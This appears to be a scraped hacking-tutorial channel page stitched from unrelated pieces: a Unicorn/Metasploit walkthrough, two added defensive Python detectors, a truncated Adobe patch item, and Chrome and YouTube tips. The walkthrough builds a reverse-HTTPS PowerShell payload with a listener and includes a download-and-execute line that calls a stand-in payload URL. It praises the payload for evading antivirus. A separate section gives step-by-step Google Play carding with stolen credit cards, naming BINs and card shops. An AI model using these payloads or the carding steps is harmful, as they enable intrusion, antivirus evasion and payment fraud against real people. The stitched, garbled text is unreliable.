To view the available Unicorn options and a description of each attack vector, run ./unicorn.py --help.
@free_hacking_tutorial
./unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
Step 3
Generate the Payload
To create a payload with Unicorn, use the below command.
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
Unicorn will use the Metasploit reverse_https module to connect back to the attacker's IP address on the specified port.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[Unicorn's ASCII-art banner, garbled by extraction, omitted]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.
The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.
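Because the generated powershell_attack.txt is meant to be pasted into a command prompt, the defender's view of it is a PowerShell process-creation event. The following is an added example (not from the original article or from Unicorn) that decodes -EncodedCommand command lines and scores them on indicators typical of in-memory injection; the command lines are constructed samples and the indicator weights are assumptions.

```python
import base64
import binascii
import re


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples (not from the page or from Unicorn): one benign admin
# command line and one shaped like an in-memory injection one-liner, i.e. a
# hidden PowerShell window that decodes and evaluates native-API calls.
INJECTION_SCRIPT = (
    "$code='[DllImport(\"kernel32.dll\")]public static extern IntPtr "
    "VirtualAlloc(IntPtr a,uint s,uint t,uint p);';"
    "$k=Add-Type -MemberDefinition $code -Name K -PassThru;"
    "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($s)))"
)
SAMPLES = {
    "benign": "powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1",
    "suspicious": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_ps(INJECTION_SCRIPT),
}

# Indicator weights are assumptions for illustration, not a vendor's scoring.
CMDLINE_INDICATORS = {
    "hidden-window": (re.compile(r"(?i)[-/]w(?:indowstyle)?\s+(?:hidden|1)\b"), 2),
    "policy-bypass": (re.compile(r"(?i)[-/]e(?:x(?:ec(?:utionpolicy)?)?|p)\s+bypass\b"), 2),
    "no-profile": (re.compile(r"(?i)[-/]no(?:p(?:rofile)?)?\b"), 1),
}
SCRIPT_INDICATORS = {
    "expression-eval": (re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"), 3),
    "remote-download": (re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest"), 3),
    "memory-api": (re.compile(r"(?i)VirtualAlloc|VirtualProtect|CreateThread|WriteProcessMemory"), 4),
    "native-interop": (re.compile(r"(?i)DllImport|Add-Type\b|kernel32"), 2),
    "nested-base64": (re.compile(r"(?i)FromBase64String"), 2),
}


def extract_encoded_script(cmdline: str):
    """Return the decoded -EncodedCommand script, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc,
    ...), so match by prefix rather than by the full switch name."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        opt = tok[1:].lower()
        if tok[:1] not in "-/" or not opt or not "encodedcommand".startswith(opt):
            continue
        try:
            return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            return None
    return None


def analyze(cmdline: str) -> dict:
    """Score one process-creation command line; higher = more injection-like."""
    hits, score = [], 0
    for name, (pattern, weight) in CMDLINE_INDICATORS.items():
        if pattern.search(cmdline):
            hits.append(name)
            score += weight
    script = extract_encoded_script(cmdline)
    if script is not None:
        hits.append("encoded-command")
        score += 2
        for name, (pattern, weight) in SCRIPT_INDICATORS.items():
            if pattern.search(script):
                hits.append(name)
                score += weight
    return {"score": score, "indicators": hits, "decoded_script": script}


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        result = analyze(cmd)
        print(f"{label:10s} score={result['score']:2d} {result['indicators']}")
```

A threshold on the score is a triage aid, not a verdict: the decoded script is what an analyst should read next.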
Step 4
Start Msfconsole Using the Resource File
To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.
msfconsole -r /opt/unicorn/unicorn.rc
=[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
The resource file automatically selects the handler (multi/handler), sets the payload type (windows/meterpreter/reverse_https), the attacker's IP address (LHOST) and the port number (LPORT), keeps the handler running after the first session (ExitOnSession false), enables stage encoding (EnableStageEncoding), and starts the listener as a background job (exploit -j) — easy. Note the last two lines of the output above: the handler could not bind to 192.168.1.5:443 directly, so msfconsole started it on 0.0.0.0:443 instead, which listens on every interface and still receives the callback.
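The resource file is a plain list of console commands, which makes it easy to review before it is run. The following parser is an added example (not from the article or from Metasploit); the rc contents are reconstructed from the session above, and the list of local addresses passed to describe_handler is an assumption.

```python
import shlex

# Resource-file contents reconstructed from the 'resource (...)>' lines of
# the msfconsole session above; the leading comment line is constructed to
# show that comments are skipped.
UNICORN_RC = """\
# handler setup written by unicorn (constructed comment line)
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.5
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j
"""


def parse_rc(text: str) -> dict:
    """Parse an msfconsole resource file: one console command per line.

    Handles use/set/exploit(run); anything else is kept verbatim so a reviewer
    sees every command the file would execute. Option names are upper-cased
    because msfconsole treats them case-insensitively."""
    rc = {"module": None, "options": {}, "actions": [], "other": []}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        cmd = parts[0].lower()
        if cmd == "use" and len(parts) == 2:
            rc["module"] = parts[1]
        elif cmd == "set" and len(parts) == 3:
            rc["options"][parts[1].upper()] = parts[2]
        elif cmd in ("exploit", "run"):
            rc["actions"].append(" ".join(parts))
        else:
            rc["other"].append((lineno, line))
    return rc


def describe_handler(rc: dict, local_addresses) -> list:
    """Turn the parsed file into the plain-language facts a reviewer wants,
    including the bind failure seen in the session above when LHOST is not
    an address of the machine running msfconsole."""
    opts, facts = rc["options"], []
    facts.append(f"module: {rc['module']}; payload: {opts.get('PAYLOAD')}")
    lhost, lport = opts.get("LHOST"), opts.get("LPORT")
    facts.append(f"callbacks expected on {lhost}:{lport}")
    if lhost not in set(local_addresses):
        facts.append(f"LHOST {lhost} is not local: bind fails, msfconsole falls back to 0.0.0.0:{lport}")
    if lport and lport.isdigit() and int(lport) < 1024:
        facts.append("LPORT below 1024 needs root to bind on Linux")
    if opts.get("EXITONSESSION", "true").lower() == "false" and any(a.endswith("-j") for a in rc["actions"]):
        facts.append("background job keeps listening after the first session")
    if opts.get("ENABLESTAGEENCODING", "false").lower() == "true":
        facts.append("second stage is encoded before being sent to the target")
    return facts


if __name__ == "__main__":
    for fact in describe_handler(parse_rc(UNICORN_RC), ["127.0.0.1", "10.0.0.7"]):
        print("-", fact)
```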
At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.
That's it for installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup. Unicorn is a great tool that takes the difficulty out of creating sophisticated PowerShell payloads capable of bypassing popular antivirus software. In my follow-up article, I'll show how to convert the PowerShell code into an executable and a few tricks for making the executable appear as an ordinary text file, so stay tuned.
Step 5
Test the Payload (Don't Upload It to VirusTotal)
In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.
Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developers explicitly caution against using VirusTotal every time the program starts.
As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.
As an alternative to online scanners, I encourage pentesters to simulate their target's operating system environment using virtual machines. For example, if it's discovered that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This gives pentesters some reassurance that a payload is working properly and prevents VirusTotal from analyzing the malicious file and sharing its results with other companies.
Adobe Releases Security Patch Updates For 112 Vulnerabilities
Adobe has released security patches for a total of 112 vulnerabilities in its products, most of which have a higher risk of being exploited.
The vulnerabilities addressed in this month's patch Tuesday affect Adobe Flash Player, Adobe Experience Manager, Adobe Connect, Adobe Acrobat, and Reader.
None of the security vulnerabilities patched this month were either publicly disclosed or found being
🎁 Google play store carding 🎁
➖➖➖➖➖➖➖➖➖➖➖➖
1.If you wanna card Google play and Google play gift card
👉 As usual clear your Cookies in browser via Ccleaner.
[According to the BIN, I have mentioned the IP below]
2. Then go to any app that is paid and below like 2$ or less , go to payment info.
3. Get your live CC from me or buy from shop like unicc, jstash etc..,
4. Bin recommended 517805,372739 ,417409 or amex gold ,capital one bank (only USA cc)
5. If you going for public cc I recommend Amex, are good for google play
❗️Even if the card dont have name and zip you can add any name and us zip because those bin are Non-AVS
[If you dont know what is Non-Avs / AVS the just click it to learn
6. Now save the card and ready to pay.
7. If the payment successful for that app,
👉 then go to buy google play credit and select your gift card 5$,10$,15$,25$ or 50$ .
8. Now all done and it will success mostly because of Non-AVS BIN.
9. Even if card declined after use, Google play never charge back and card showing declined will always work for small amount like 5$ after few weeks.
➖ @free_hacking_tutorial➖
How To Make Google Chrome Browse More Faster With These 4 Steps🤩🤩🤩
The method is very simple: we will be editing some hidden features of Chrome, which will speed it up and make it load web pages faster. Follow the methods below to proceed:
#1 Method: Editing Chrome Flag Settings To Make It Faster
1. First, open the address chrome://flags/ in Google Chrome.
2. You will see a long list of settings there.
3. Search for "Maximum tiles for interest area" and change its value to 512; this is the maximum RAM you will be allocating to Chrome. (You can use Ctrl+F to find these options.)
4. Now search for "Number of raster threads" and change its value to 4.
5. Now enable "Enable fast tab/window close".
6. That's it; relaunch your browser and enjoy its faster performance.
#2 Method: Using A Google Chrome Extension
1. Download and install the Web Boost plugin in Google Chrome.
2. That's it: the extension is added to your browser and its icon appears at the top right corner; just click it to start it.
#3 Method: Changing The Settings In Google Chrome
1. First, go to the three-line button at the top right corner of Google Chrome.
2. Then click "Settings" and then "Show Advanced Settings".
3. Now under Privacy look for "Prefetch resources to load pages more quickly" and tick it.
4. In Chrome for Android you will have 3 options, which can be set as follows:
Always: load pages on both cellular and Wi-Fi networks.
Wifi: prefetch pages only when a Wi-Fi connection is available.
Never: never prefetch pages; this can save data on a limited connection.
#4 Method: Clearing Cache & Unnecessary Plugins and Extensions
1. Type chrome://plugins/ in Google Chrome and remove the plugins that are unnecessary in your browser.
2. Type chrome://extensions/ in your Chrome browser and remove all the extensions you don't need.
3. Type chrome://settings/clearBrowserData and clear all your history from the beginning, including history, cache files and all other saved data of your browser, to make it faster.
With these methods you can easily boost your browser speed and enjoy fast switching between tabs.
⭕YOUTUBE TRICKS⭕
Are you fond of downloading music and videos but have problems downloading them? Here are some YouTube tricks.
1. To download only the audio of a music video, go to the address bar, replace "youtube" with "listentoyoutube" in the URL and load it to download the video's audio.
2. To download YouTube videos in any format, such as mp3, mp4 or 3gp, replace "youtube" with "ssyoutube" in the browser URL and load it.
3. Tired of age restrictions when downloading a video from YouTube? Replace "youtube" with "nsfwyoutube" in the URL and load it.
4. To remove adverts from YouTube, replace "youtube" with "youtubeskip" in the URL and load it.
5. To convert a video to Graphics Interchange Format (GIF), replace "youtube" with "gifyoutube" in the URL.